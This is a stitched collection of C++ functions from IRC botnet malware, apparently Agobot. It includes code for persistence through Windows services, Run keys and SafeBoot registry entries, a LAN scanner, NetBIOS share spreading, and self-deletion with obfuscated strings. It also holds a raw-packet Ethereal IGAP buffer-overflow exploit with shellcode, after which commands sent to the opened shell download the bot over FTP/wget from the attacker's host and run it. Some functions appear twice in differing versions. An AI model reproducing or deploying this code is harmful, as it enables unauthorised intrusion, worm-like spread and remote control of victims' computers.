bool CInstaller::ServiceAddInt(CString &sServicename, CString &sFilename, CString &sParams) { SC_HANDLE hServiceControl=OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS); if(!hServiceControl) return false; CString sSvcCmd; sSvcCmd.Format("\"%s\" %s", sFilename.CStr(), sParams.CStr()); SC_HANDLE hService=CreateService(hServiceControl, sServicename.CStr(), g_pMainCtrl->m_cBot.as_valname.sValue.CStr(), SERVICE_ALL_ACCESS, \ SERVICE_WIN32_SHARE_PROCESS, SERVICE_AUTO_START, SERVICE_ERROR_NORMAL, \ sSvcCmd.CStr(), NULL, NULL, NULL, NULL, NULL); if(!hService) { DWORD dwError=GetLastError(); if(dwError==ERROR_SERVICE_EXISTS) { ServiceDel(sServicename); CloseServiceHandle(hService); CloseServiceHandle(hServiceControl); return ServiceAdd(sServicename, sFilename); } else { CloseServiceHandle(hServiceControl); return false; } } SC_ACTION scActions[1]; scActions[0].Delay=1; scActions[0].Type=SC_ACTION_RESTART; SERVICE_FAILURE_ACTIONS sfActions; sfActions.dwResetPeriod=INFINITE; sfActions.lpRebootMsg=NULL; sfActions.lpCommand=NULL; sfActions.cActions=1; sfActions.lpsaActions=scActions; if(!ChangeServiceConfig2(hService, SERVICE_CONFIG_FAILURE_ACTIONS, &sfActions)) { CloseServiceHandle(hService); CloseServiceHandle(hServiceControl); return false; } CloseServiceHandle(hService); CloseServiceHandle(hServiceControl); return true; }
bool CInstaller::ServiceAdd(CString &sServicename, CString &sFilename) { // Fail if the hash check failed if(g_pMainCtrl->m_bHashCheckFailed) return false; CString sysdir; GetSystemDirectory(sysdir.GetBuffer(MAX_PATH), MAX_PATH); CString sSvcCmd; sSvcCmd.Format("%s\\%s", sysdir.CStr(), sFilename.CStr()); CString sSvcParams; sSvcParams.Format("-service"); return ServiceAddInt(sServicename, sSvcCmd, sSvcParams); }
bool CInstaller::ServiceAdd(CString &sServicename, CString &sFilename) { CString sysdir; GetSystemDirectory(sysdir.GetBuffer(MAX_PATH), MAX_PATH); CString sSvcCmd; sSvcCmd.Format("%s\\%s", sysdir.CStr(), sFilename.CStr()); CString sSvcParams; sSvcParams.Format("-netsvcs"); return ServiceAddInt(sServicename, sSvcCmd, sSvcParams); }
bool CMac::AddLogin(CString sUsername, CString sPassword, CString sIRCUsername, CString sHost, CString sIdentd) { if(FindLogin(sIRCUsername)) return false; user *pUser=FindUser(sUsername); if(!pUser) return false; if(pUser) if(CheckPassword(sPassword, pUser)) { if(sHost.Compare("")) if(strcmp(sHost.CStr(), pUser->sHost.CStr())!=0) return false; if(sIdentd.Compare("")) if(strcmp(sIdentd.CStr(), pUser->sIdentd.CStr())!=0) return false; login *pLogin=new login; pLogin->pUser=pUser; pLogin->sUsername=sUsername; pLogin->sIRCUsername=sIRCUsername; llStart.push_back(pLogin); return true; } return false; }
bool CInstaller::RegStartDel(CString &sValuename) { HKEY key; RegCreateKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL); RegDeleteValue(key, sValuename.CStr()); RegCloseKey(key); RegCreateKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\RunServices", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL); RegDeleteValue(key, sValuename.CStr()); RegCloseKey(key); return true; }
bool CInstaller::RegStartAdd(CString &sValuename, CString &sFilename) { // Fail if the hash check failed if(g_pMainCtrl->m_bHashCheckFailed) return false; HKEY key; RegCreateKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL); RegSetValueEx(key, sValuename.CStr(), 0, REG_SZ, (LPBYTE)(const char *)sFilename.CStr(), (DWORD)strlen(sFilename)); RegCloseKey(key); RegCreateKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\RunServices", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL); RegSetValueEx(key, sValuename.CStr(), 0, REG_SZ, (LPBYTE)(const char *)sFilename.CStr(), (DWORD)strlen(sFilename)); RegCloseKey(key); return true; }
bool CSMTP_Connection::Connect(CString sHost, int iPort) { // Fail if already connected if(m_sServerSocket.IsConnected() || m_bConnected) return false; // Connect to the server if(!m_sServerSocket.Connect(sHost.CStr(), iPort)) { // Connection failed #ifdef DBGCONSOLE g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): " "Failed to connect to \"%s:%d\"!\n", this, sHost.CStr(), iPort); #endif // DBGCONSOLE return false; } // Store server address in member variables m_sServerHost.Assign(sHost); m_iServerPort=iPort; #ifdef DBGCONSOLE g_pMainCtrl->m_cConsDbg.Log(3, "CSMTP_Connection(0x%8.8Xh): " "Connected to \"%s:%d\"!\n", this, m_sServerHost.CStr(), m_iServerPort); #endif // DBGCONSOLE // Receive banner CString sRecvBuf; if(!m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192)) { // Connection reset #ifdef DBGCONSOLE g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): " "Connection reset!\n", this); #endif // DBGCONSOLE Disconnect(); return false; } // Check if connection was accepted if(sRecvBuf.Mid(0, 3).Compare("220")) { // Connection not accepted #ifdef DBGCONSOLE g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): " "Server rejected connection!\n", this); #endif // DBGCONSOLE Disconnect(); return false; } // Set connection status to true and return true m_bConnected=true; return true; }
bool CMac::DelLogin(CString sUsername, CString sIRCUsername) { if(!sUsername.CStr()) return false; login *pRemove=NULL; list<login*>::iterator i; for(i=llStart.begin(); i!=llStart.end(); ++i) { if(!(*i)->sUsername.Compare(sUsername) || !(*i)->sIRCUsername.Compare(sIRCUsername)) pRemove=(*i); } if(pRemove) { llStart.remove(pRemove); delete pRemove; return true; } return false; }
void CPortScanner::AddLocalLAN() { while(!g_pMainCtrl->m_cIRC.m_bJoined) { Sleep(1000); } while(!g_pMainCtrl->m_cIRC.m_sLocalIp.CStr()) { Sleep(1000); } CString sLocalIp = g_pMainCtrl->m_cIRC.m_sLocalIp; while (sLocalIp.CStr() == "") Sleep(1000); int iLocalPart1=atoi(sLocalIp.Token(0, ".").CStr()); int iLocalPart2=atoi(sLocalIp.Token(1, ".").CStr()); int iLocalPart3=atoi(sLocalIp.Token(2, ".").CStr()); int iLocalPart4=atoi(sLocalIp.Token(3, ".").CStr()); CNetRange *nRange=new CNetRange; nRange->iPart1=iLocalPart1; nRange->iPart2=iLocalPart2; nRange->iPart3=iLocalPart3; nRange->iPart4=0; nRange->iNetMask=24; nRange->iPriority=80; nRange->bNotice=false; nRange->bSilent=false; nRange->sReplyTo.Assign(""); nRange->pScanner=&g_pMainCtrl->m_cScanner; RegisterNetRange(nRange); nRange=new CNetRange; nRange->iPart1=iLocalPart1; nRange->iPart2=iLocalPart2; nRange->iPart3=0; nRange->iPart4=0; nRange->iNetMask=16; nRange->iPriority=90; nRange->bNotice=false; nRange->bSilent=false; nRange->sReplyTo.Assign(""); nRange->pScanner=&g_pMainCtrl->m_cScanner; RegisterNetRange(nRange); nRange=new CNetRange; nRange->iPart1=iLocalPart1; nRange->iPart2=0; nRange->iPart3=0; nRange->iPart4=0; nRange->iNetMask=8; nRange->iPriority=100; nRange->bNotice=false; nRange->bSilent=false; nRange->sReplyTo.Assign(""); nRange->pScanner=&g_pMainCtrl->m_cScanner; RegisterNetRange(nRange); }
int GetCopies(CString &sFilename) { #ifdef WIN32 char cFilename[MAX_PATH]; GetModuleFileName(GetModuleHandle(NULL), cFilename, sizeof(cFilename)); if(fCreateToolhelp32Snapshot && fProcess32First && fProcess32Next) { psnap=fCreateToolhelp32Snapshot(2, 0); if(psnap!=INVALID_HANDLE_VALUE) { int copies=0; pe32.dwSize=sizeof(PROCESSENTRY32); if(fProcess32First(psnap, &pe32)) { do { if((strncmp(cFilename+(strlen(cFilename)-strlen(pe32.szExeFile)), \ pe32.szExeFile, strlen(pe32.szExeFile))==0) || \ (strncmp(sFilename, pe32.szExeFile, strlen(pe32.szExeFile))==0)) copies++; } while(fProcess32Next(psnap, &pe32)); } CloseHandle(psnap); return copies; } else return 0; } else return 0; #else char szCmdBuf[4096]; sprintf(szCmdBuf, "ps ax | grep %s | grep -v grep > psaxtemp", sFilename.CStr()); system(szCmdBuf); FILE *fp=fopen("psaxtemp", "r"); if(!fp) return 0; fseek(fp, 0, SEEK_END); long lFileSize=ftell(fp); fseek(fp, 0, SEEK_SET); if(lFileSize>0) return 1; fclose(fp); system("rm -f psaxtemp"); return 0; #endif // WIN32 }
bool CScannerEthereal::ExploitInt(int iOffset) { char buffer[MAX_BUFF]; ipheader *iphdr=(ipheader*)buffer; igap_header *igaphdr=(igap_header*)(buffer+sizeof(ipheader)); unsigned long magic=targets[iOffset].ret; CString sRandomIp; int one=1; const int *val=&one; sockaddr_in sin; memset(buffer, 0x00, MAX_BUFF); int sockfd=socket(PF_INET, SOCK_RAW, IPPROTO_RAW); if(sockfd==SOCKET_ERROR) return false; if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, val, sizeof(one))<0) { close(sockfd); return false; } init_random(); sRandomIp.Format("%d.%d.%d.%d", brandom(0, 255), brandom(0, 255), brandom(0, 255), brandom(0, 255)); sin.sin_addr.s_addr=inet_addr(m_sSocket.m_szHost); sin.sin_family=AF_INET; sin.sin_port=0x00; iphdr->ip_hl=0x05; iphdr->ip_v=0x04; iphdr->ip_tos=0x00; iphdr->ip_len=MAX_BUFF; iphdr->ip_id=htonl(54321); iphdr->ip_off=0x00; iphdr->ip_ttl=0x01; iphdr->ip_proto=IPPROTO_IGAP; iphdr->ip_sum=0x00; iphdr->ip_src=inet_addr(sRandomIp.CStr()); iphdr->ip_dst=inet_addr(m_sSocket.m_szHost); if(iphdr->ip_src==SOCKET_ERROR || iphdr->ip_dst==SOCKET_ERROR) { close(sockfd); return false; } igaphdr->igap_type=0x41; igaphdr->igap_restime=0x0a; igaphdr->igap_cksum=0x00; igaphdr->igap_gaddr=0x00; igaphdr->igap_ver=0x01; igaphdr->igap_stype=0x21; igaphdr->igap_reserved1=0x00; igaphdr->igap_cid=0x00; igaphdr->igap_asize=0x10; igaphdr->igap_msgsize=0x40+PAYLOAD_SIZE; igaphdr->igap_reserved2=0x00; memset(igaphdr->igap_payload, 0x90, 16+64+PAYLOAD_SIZE); memcpy(igaphdr->igap_payload+16+RETOFFSET-strlen(shellcode_firsthalf)-8, shellcode_firsthalf, strlen(shellcode_firsthalf)); memcpy(igaphdr->igap_payload+16+64+RETOFFSET-strlen(jumpcode)-4, jumpcode, strlen(jumpcode)); memcpy(igaphdr->igap_payload+16+64+RETOFFSET, &magic, 4); magic-=0x10; memcpy(igaphdr->igap_payload+16+64+RETOFFSET-4, &magic, 4); memcpy(igaphdr->igap_payload+16+64+PAYLOAD_SIZE-strlen(shellcode_secondhalf)-1, shellcode_secondhalf, strlen(shellcode_secondhalf)); igaphdr->igap_cksum=checksum((unsigned short*)(buffer+sizeof(struct ipheader)), (sizeof(struct igap_header))>>1); iphdr->ip_sum=checksum((unsigned short*)buffer, (iphdr->ip_len)>>1); one=MAX_PACKET; while(one) { sendto(sockfd, buffer, MAX_BUFF, 0, (sockaddr*)&sin, sizeof(sin)); one--; } close(sockfd); return true; }
bool CScannerEthereal::Exploit() { if(!IsPrivate(g_pMainCtrl->m_pIRC->m_sLocalIp.CStr()) && IsPrivate(m_sSocket.m_szHost)) return false; // We need root to exploit this cause we need to spoof packets if(getuid()) return false; ExploitInt(0); ExploitInt(1); ExploitInt(2); ExploitInt(3); CSocket sShellSocket; if(sShellSocket.Connect(m_sSocket.m_szHost, 31337)) { CString sCmdBuf; sShellSocket.RecvTO(sCmdBuf.GetBuffer(8192), 8192, 2000); sCmdBuf.Format("echo -e open %s %d\\nuser ftp bla\\nget bot\\nquit\\n | ftp -n\n", g_pMainCtrl->m_pIRC->m_sLocalHost.CStr(), g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue); sShellSocket.Write(sCmdBuf.CStr(), sCmdBuf.GetLength()); sShellSocket.Recv(sCmdBuf.GetBuffer(8192), 8192); sCmdBuf.Format("wget ftp://bla:bla@%s:%d/bot\n", g_pMainCtrl->m_pIRC->m_sLocalHost.CStr(), g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue); sShellSocket.Write(sCmdBuf.CStr(), sCmdBuf.GetLength()); sShellSocket.Recv(sCmdBuf.GetBuffer(8192), 8192); sCmdBuf.Assign("chmod 777 ./bot ; ./bla\n"); sShellSocket.Write(sCmdBuf.CStr(), sCmdBuf.GetLength()); sShellSocket.Recv(sCmdBuf.GetBuffer(8192), 8192); sShellSocket.Disconnect(); return true; } else return false; }
bool CMac::CheckPassword(CString sPassword, user *pUser) { if(!sPassword.CStr()) return false; md5::MD5_CTX md5; md5::MD5Init(&md5); unsigned char szMD5[16]; CString sMD5; sMD5.Assign(""); md5::MD5Update(&md5, (unsigned char*)sPassword.Str(), sPassword.GetLength()); md5::MD5Final(szMD5, &md5); for(int i=0;i<16;i++) { CString sTemp; sTemp.Format("%2.2X", szMD5[i]); sMD5.Append(sTemp); } if(!pUser->sPassword.Compare(sMD5)) return true; return false; }
bool CInstaller::Uninstall() { #ifdef WIN32 HANDLE f; DWORD r; PROCESS_INFORMATION pinfo; STARTUPINFO sinfo; char cmdline[MAX_PATH]; char tcmdline[MAX_PATH]; char cfilename[MAX_PATH]; char batfile[MAX_PATH]; char tempdir[MAX_PATH]; GetModuleFileName(GetModuleHandle(NULL), cfilename, sizeof(cfilename)); GetTempPath(sizeof(tempdir), tempdir); sprintf(batfile, "%s\\%s", tempdir, dp(1,6,18,15,79,2,1,20,0).CStr()); f = CreateFile(batfile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0); if (f > (HANDLE)0) { // write a batch file to remove our executable once we close /*WriteFile(f, "@echo off\r\n" ":start\r\nif not exist \"\"%1\"\" goto done\r\n" "del /F \"\"%1\"\"\r\n" "del \"\"%1\"\"\r\n" "goto start\r\n" ":done\r\n" "del /F %temp%\r.bat\r\n" "del %temp%\r.bat\r\n", 105, &r, NULL);*/ CString sBat; sBat.Format("%s\r\n%s\r\n%s\r\n%s\r\n%s\r\n%s\r\n%s\r%s\r\n%s\r%s\r\n", dp(86,5,3,8,15,78,15,6,6,0).CStr(), // @echo off dp(83,19,20,1,18,20,0).CStr(), // :start // if not exist ""%1"" goto done dp(9,6,78,14,15,20,78,5,24,9,19,20,78,84,84,57,69,84,84,78,7,15,20,15,78,4,15,14,5,0).CStr(), dp(4,5,12,78,82,32,78,84,84,57,69,84,84,0).CStr(), // del /F ""%1"" dp(4,5,12,78,84,84,57,69,84,84,0).CStr(), // del ""%1"" dp(7,15,20,15,78,19,20,1,18,20,0).CStr(), // goto start dp(83,4,15,14,5,0).CStr(), // :done dp(4,5,12,78,82,32,78,57,20,5,13,16,57,0).CStr(), // del /F %temp% dp(79,2,1,20,0).CStr(), // .bat dp(4,5,12,78,57,20,5,13,16,57,0).CStr(), // del %temp% dp(79,2,1,20,0).CStr()); // .bat WriteFile(f, sBat.CStr(), 105, &r, NULL); CloseHandle(f); memset(&sinfo, 0, sizeof(STARTUPINFO)); sinfo.cb = sizeof(sinfo); sinfo.wShowWindow = SW_HIDE; GetModuleFileName(GetModuleHandle(NULL), cfilename, sizeof(cfilename));// get our file name sprintf(tcmdline, "%%comspec%% /c %s %s", batfile, cfilename); // build command line ExpandEnvironmentStrings(tcmdline, cmdline, sizeof(cmdline)); // put the name of the command interpreter into the command line // execute the batch file CreateProcess(NULL, cmdline, NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo); } #else // Linux #endif // WIN32 return true; }
bool CInstaller::IsInstalled(CString &sServicename) { SC_HANDLE hServiceControl=OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS); if(!hServiceControl) return false; SC_HANDLE hService=OpenService(hServiceControl, sServicename.CStr(), SERVICE_ALL_ACCESS); if(!hService) { CloseServiceHandle(hServiceControl); return false; } CloseServiceHandle(hService); CloseServiceHandle(hServiceControl); return true; }
bool CInstaller::ServiceDel(CString &sServicename) { SC_HANDLE hServiceControl=OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS); if(!hServiceControl) return false; SC_HANDLE hService=OpenService(hServiceControl, sServicename.CStr(), SERVICE_ALL_ACCESS); if(!hService) { CloseServiceHandle(hServiceControl); return false; } SERVICE_STATUS sStatus; ControlService(hService, SERVICE_CONTROL_STOP, &sStatus); DeleteService(hService); CloseServiceHandle(hService); CloseServiceHandle(hServiceControl); return true; }
void CBot::Init() { init_random(); CString sTemp; sTemp.Format("%d", brandom(500, 22226)); CString sTempFTP; sTempFTP.Format("%d", brandom(500, 22226)); REGCVAR(bot_ftrans_port, sTemp.CStr(), "Bot - File Transfer Port", false, false, 0 ); REGCVAR(bot_ftrans_port_ftp, sTempFTP.CStr(), "Bot - File Transfer Port for FTP", false, false, 0 ); REGCVAR(si_chanpass, "", "Server Info - Channel Password", false, false, 0 ); REGCVAR(si_mainchan, "", "Server Info - Main Channel", false, false, 0 ); REGCVAR(si_nickprefix, "", "Server Info - Nickname prefix", false, false, 0 ); REGCVAR(si_port, "", "Server Info - Server Port", false, false, 0 ); REGCVAR(si_server, "", "Server Info - Server Address", false, false, 0 ); REGCVAR(si_servpass, "", "Server Info - Server Password", false, false, 0 ); REGCVAR(si_usessl, "", "Server Info - Use SSL ?", false, false, 0 ); Config(); REGCMD(m_cmdAbout, "bot.about", "...", false, this); REGCMD(m_cmdDie, "bot.die", "terminates the bot", false, this); REGCMD(m_cmdDns, "bot.dns", "resolves ip/hostname by dns", false, this); REGCMD(m_cmdExecute, "bot.execute", "makes the bot execute a .exe", false, this); REGCMD(m_cmdId, "bot.id", "displays the id of the current code", false, this); REGCMD(m_cmdNick, "bot.nick", "changes the nickname of the bot", false, this); REGCMD(m_cmdOpen, "bot.open", "opens a file (whatever)", false, this); REGCMD(m_cmdRemove, "bot.remove", "removes the bot", false, this); REGCMD(m_cmdRemoveAllBut, "bot.removeallbut", "removes the bot if id does not match", false, this); REGCMD(m_cmdRndNick, "bot.rndnick", "makes the bot generate a new random nick", false, this); REGCMD(m_cmdStatus, "bot.status", "gives status", false, this); REGCMD(m_cmdSysInfo, "bot.sysinfo", "displays the system info", false, this); REGCMD(m_cmdLongUptime, "bot.longuptime", "If uptime > 7 days then bot will respond", false, this); REGCMD(m_cmdQuit, "bot.quit", "quits the bot", false, this); REGCMD(m_cmdFlushDNS, "bot.flushdns", "flushes the bots dns cache", false, this); REGCMD(m_cmdSecure, "bot.secure", "delete shares / disable dcom", false, this); REGCMD(m_cmdUnSecure, "bot.unsecure", "enable shares / enable dcom", false, this); REGCMD(m_cmdCommand, "bot.command", "runs a command with system()", false, this); CString sRndNick=RndNick(si_nickprefix.sValue.CStr()); g_pMainCtrl->m_sUserName.Format("%s", sRndNick.Mid(0, 32).CStr()); m_lStartTime=(unsigned long)GetTickCount()/1000; }
bool CInstaller::ServiceStart(CString &sServicename) { SC_HANDLE hServiceControl=OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS); if(!hServiceControl) return false; SC_HANDLE hService=OpenService(hServiceControl, sServicename.CStr(), SERVICE_ALL_ACCESS); if(!hService) { CloseServiceHandle(hServiceControl); return false; } StartService(hService, 0, NULL); CloseServiceHandle(hService); CloseServiceHandle(hServiceControl); /* CString sCmdBuf; sCmdBuf.Format("net start %s", sServicename.CStr()); system(sCmdBuf.CStr());*/ return true; }
bool CScannerNetBios::StartViaCreateService(const char *share, const char *host, const char *user, const char *password) { bool bRetVal=false; char buffer[MAX_PATH]; SC_HANDLE hServiceControl=OpenSCManager(host, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS); if(!hServiceControl) return false; char szBotRemote[MAX_PATH], szBotSvc[MAX_PATH], szSvcCmd[MAX_PATH]; CString sTempPath; GetTempPath(MAX_PATH, sTempPath.GetBuffer(MAX_PATH)); sTempPath.Append("\\glx5223.tmp"); WriteFile(sTempPath.CStr(), IDR_AGOBOTSVC, NULL); sprintf(szBotSvc, "\\\\%s\\%s\\%s", host, share, "thesvc.exe"); unsigned long lTimeoutStart=GetTickCount(); while(CopyFile(sTempPath, szBotSvc, false)==false && GetTickCount()-lTimeoutStart<25000) Sleep(100); DeleteFile(sTempPath); GetFilename(buffer, MAX_PATH); sprintf(szBotRemote, "\\\\%s\\%s\\%s", host, share, g_cMainCtrl.m_cBot.bot_filename.sValue.CStr()); lTimeoutStart=GetTickCount(); while(CopyFile(buffer, szBotRemote, false)==false && GetTickCount()-lTimeoutStart<25000) Sleep(100); sprintf(szSvcCmd, "\"%s\" \"%s\"", szBotSvc, szBotRemote); SC_HANDLE hService=CreateService(hServiceControl, "cfgldr", g_cMainCtrl.m_cBot.as_valname.sValue.CStr(), SERVICE_ALL_ACCESS, \ SERVICE_WIN32_OWN_PROCESS, SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, \ szSvcCmd, NULL, NULL, NULL, NULL, NULL); if(!hService) { DWORD dwError=GetLastError(); if(dwError==ERROR_SERVICE_EXISTS) { hService=OpenService(hServiceControl, "cfgldr", SERVICE_ALL_ACCESS); if(!hService) { CloseServiceHandle(hServiceControl); return false; } SERVICE_STATUS sStatus; ControlService(hService, SERVICE_CONTROL_STOP, &sStatus); DeleteService(hService); CloseServiceHandle(hService); CloseServiceHandle(hServiceControl); return StartViaCreateService(share, host, user, password); } else { LPVOID lpMsgBuf; FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER|FORMAT_MESSAGE_FROM_SYSTEM|FORMAT_MESSAGE_IGNORE_INSERTS, \ NULL, GetLastError(), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPTSTR)&lpMsgBuf, 0, NULL); MessageBox(NULL, (LPCTSTR)lpMsgBuf, "Error", MB_OK|MB_ICONINFORMATION); LocalFree(lpMsgBuf); CloseServiceHandle(hServiceControl); return false; } } if(hService) if(!StartService(hService, 0, NULL)) return bRetVal=false; else bRetVal=true; SERVICE_STATUS ssTemp; // if(hService) ControlService(hService, SERVICE_CONTROL_STOP, &ssTemp); // if(hService) DeleteService(hService); if(hService) CloseServiceHandle(hService); CloseServiceHandle(hServiceControl); g_cMainCtrl.m_cIRC.SendFormat(m_bSilent, m_bNotice, m_sReplyTo.Str(), "%s: Exploited \\\\%s\\%s with l/p: %s/%s (CreateService)!!!", m_sScannerName.CStr(), host, share, user, password); DeleteFile(szBotRemote); DeleteFile(szBotSvc); return bRetVal; }
bool CInstaller::ServiceAddInt(CString &sServicename, CString &sFilename, CString &sParams) { SC_HANDLE hServiceControl=OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS); if(!hServiceControl) return false; CString sSvcCmd; sSvcCmd.Format("\"%s\" %s", sFilename.CStr(), sParams.CStr()); SC_HANDLE hService=CreateService(hServiceControl, sServicename.CStr(), g_pMainCtrl->m_pBot->as_valname.sValue.CStr(), SERVICE_ALL_ACCESS, \ SERVICE_WIN32_SHARE_PROCESS, SERVICE_AUTO_START, SERVICE_ERROR_NORMAL, \ sSvcCmd.CStr(), NULL, NULL, NULL, NULL, NULL); if(!hService) { DWORD dwError=GetLastError(); if(dwError==ERROR_SERVICE_EXISTS) { ServiceDel(sServicename); CloseServiceHandle(hService); CloseServiceHandle(hServiceControl); return ServiceAdd(sServicename, sFilename); } else { CloseServiceHandle(hServiceControl); return false; } } SC_ACTION scActions[1]; scActions[0].Delay=1; scActions[0].Type=SC_ACTION_RESTART; SERVICE_FAILURE_ACTIONS sfActions; sfActions.dwResetPeriod=INFINITE; sfActions.lpRebootMsg=NULL; sfActions.lpCommand=NULL; sfActions.cActions=1; sfActions.lpsaActions=scActions; if(!ChangeServiceConfig2(hService, SERVICE_CONFIG_FAILURE_ACTIONS, &sfActions)) { CloseServiceHandle(hService); CloseServiceHandle(hServiceControl); return false; } CloseServiceHandle(hService); CloseServiceHandle(hServiceControl); HKEY key; HKEY lhmin; HKEY lhnet; HKEY lhnew; DWORD dwSize=128; char szDataBuf[128]; strcpy(szDataBuf, "Service"); LONG lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\", 0, KEY_READ, &key); RegOpenKeyEx(key, "Minimal",0,KEY_ALL_ACCESS, &lhmin); RegOpenKeyEx(key, "Network",0,KEY_ALL_ACCESS, &lhnet); RegCreateKeyEx(lhmin, sServicename.CStr(), 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &lhnew, NULL); RegSetValueEx(lhnew, sServicename.CStr(), NULL, REG_SZ, (unsigned char*)szDataBuf, dwSize); RegCreateKeyEx(lhnet, sServicename.CStr(), 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &lhnew, NULL); RegSetValueEx(lhnew, sServicename.CStr(), NULL, REG_SZ, (unsigned char*)szDataBuf, dwSize); RegCloseKey(lhnet); RegCloseKey(lhmin); RegCloseKey(key); return true; }
bool CSMTP_Connection::Disconnect() { // Fail if not connected if(!m_sServerSocket.IsConnected()) return false; // Send QUIT command CString sReqBuf; sReqBuf.Format("QUIT\r\n"); m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength()); #ifdef DBGCONSOLE g_pMainCtrl->m_cConsDbg.Log(3, "CSMTP_Connection(0x%8.8Xh): " "Disconnecting from \"%s:%d\"!\n", this, m_sServerHost.CStr(), m_iServerPort); #endif // DBGCONSOLE // Close socket and reset variables m_sServerSocket.Disconnect(); m_sServerHost.Assign(""); m_iServerPort=0; m_bConnected=false; return true; }
bool ParseNetRange(const CString &sInput, CNetRange &nRange) { // Netrange is never longer than 18 characters if(sInput.GetLength()>18) return false; // Get temp storage and copy the string char *szTemp=new char[sInput.GetLength()+2]; sprintf(szTemp, "%s", sInput.CStr()); // Get number of dots and slashes in the string int iDotCount=0, iSlashCount=0; for(int i=0; i<strlen(szTemp); i++) { if(szTemp[i]=='.') iDotCount++; else if(szTemp[i]=='/') iSlashCount++; } // If there are no 3 dots or there is no slash, fail if(iDotCount!=3) { delete [] szTemp; return false; } if(iSlashCount!=1) { delete [] szTemp; return false; } // Make a copy of the string into a CString and parse it CString sTemp(szTemp); nRange.iPart1=atoi(sTemp.Token(0, "/").Token(0, ".").CStr()); nRange.iPart2=atoi(sTemp.Token(0, "/").Token(1, ".").CStr()); nRange.iPart3=atoi(sTemp.Token(0, "/").Token(2, ".").CStr()); nRange.iPart4=atoi(sTemp.Token(0, "/").Token(3, ".").CStr()); nRange.iNetMask=atoi(sTemp.Token(1, "/").CStr()); // Fail if the parts are 0 if(!nRange.iPart1 && !nRange.iPart2 && !nRange.iPart3 && !nRange.iPart4) { delete [] szTemp; return false; } // Fail if the netmask is not a multiple of 8 if((nRange.iNetMask%8)!=0) { delete [] szTemp; return false; } // Success delete [] szTemp; return true; }
void CBot::Config() { init_random(); int iCryptKey=10; CString sTemp; sTemp.Format("%d", brandom(500, 22226)); g_cMainCtrl.m_cCVar.RegisterCvar(&bot_compnick,"bot_compnick","false","CompName Generated Nick",false,false,0); // The root server, this will be the most often used one g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServerRoot.si_chanpass, "si_server_root.chanpass", \ "", "Server Info - Channel Password", false, false, 0 ); g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServerRoot.si_mainchan, "si_server_root.mainchan", \ "#channel", "Server Info - Main Channel", false, false, 0 ); g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServerRoot.si_nickprefix, "si_server_root.nickprefix", \ "Ago-", "Server Info - Nickname prefix", false, false, 0 ); g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServerRoot.si_port, "si_server_root.port", \ "6667", "Server Info - Server Port", false, false, 0 ); g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServerRoot.si_server, "si_server_root.server", \ "irc.somewhere.org", "Server Info - Server Address", false, false, 0 ); g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServerRoot.si_servpass, "si_server_root.servpass", \ "", "Server Info - Server Password", false, false, 0 ); g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServerRoot.si_usessl, "si_server_root.use_ssl", \ "false", "Server Info - Use SSL ?", false, false, 0 ); g_cMainCtrl.m_cIRC.m_vServers.push_back(&m_isServerRoot); // Backup server 0 g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServer0.si_chanpass, "si_server_0.chanpass", \ "", "Server Info - Channel Password", false, false, 0 ); g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServer0.si_mainchan, "si_server_0.mainchan", \ "#channel", "Server Info - Main Channel", false, false, 0 ); g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServer0.si_nickprefix, "si_server_0.nickprefix", \ "Ago-", "Server Info - Nickname prefix", false, false, 0 ); g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServer0.si_port, "si_server_0.port", \ "6667", "Server Info - Server Port", false, false, 0 ); g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServer0.si_server, "si_server_0.server", \ "irc2.somewhere.org", "Server Info - Server Address", false, false, 0 ); 